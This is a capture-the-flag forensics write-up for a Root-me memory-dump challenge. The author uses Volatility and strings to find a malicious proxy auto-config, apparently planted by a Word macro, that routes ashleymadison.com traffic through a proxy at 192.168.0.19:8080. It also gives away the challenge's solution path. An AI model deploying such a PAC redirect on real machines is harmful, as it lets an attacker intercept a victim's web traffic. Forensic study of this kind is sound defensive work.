Root-me.org

Malicious Word Macro

PAC

We get another memory dump for this one. The statement says that he opened a interesting word file and now he’s favorite website is not working anymore.

It looks like some kind of VBA script modified the hosts file or maybe a redirection ?

Also PAC is a hint, PAC stands for Proxy-auto-Configuration. It uses the function FindProxyForURL that allows the reconfigure an address to route via a particular address. So this should be the biggest hint.

Let’s start by finding the OS version.

 vol.py -f memory.dmp imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/p0pp3t/CTF/rootme/forensic/ch20/memory.dmp)
                      PAE type : No PAE
                           DTB : 0x185000L
                          KDBG : 0x82953c28L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82954c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-11-11 16:14:49 UTC+0000
     Image local date and time : 2016-11-11 17:14:49 +0100

Windows 7 again. We’ll use that as a profile. Let’s see the processes.

vol.py --profile=Win7SP1x86_23418 -f memory.dmp pslist | grep WORD
Volatility Foundation Volatility Framework 2.6
0x84d24490 WINWORD.EXE            3248    816     13      434      1      0 2016-11-11 16:14:05 UTC+0000                                 

Before everything else, let’s see if we can find the function FindProxyForURL using strings.

strings memory.dmp | grep "FindProxyForURL"
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)

We can see it a bunch of times. Let’s see what’s before and after those lines

strings memory.dmp | grep "FindProxyForURL" -B 3 -A 3
function FindProxyForURL(url, host)
	if (shExpMatch(url,"*.ashleymadison.com/*"))
		return "PROXY 192.168.0.19:8080";
    return "DIRECT";
function FindProxyForURL(url, host)
	if (shExpMatch(url,"*.ashleymadison.com/*"))
		return "PROXY 192.168.0.19:8080";
    return "DIRECT";
...

Well that was a little bit underwhelming…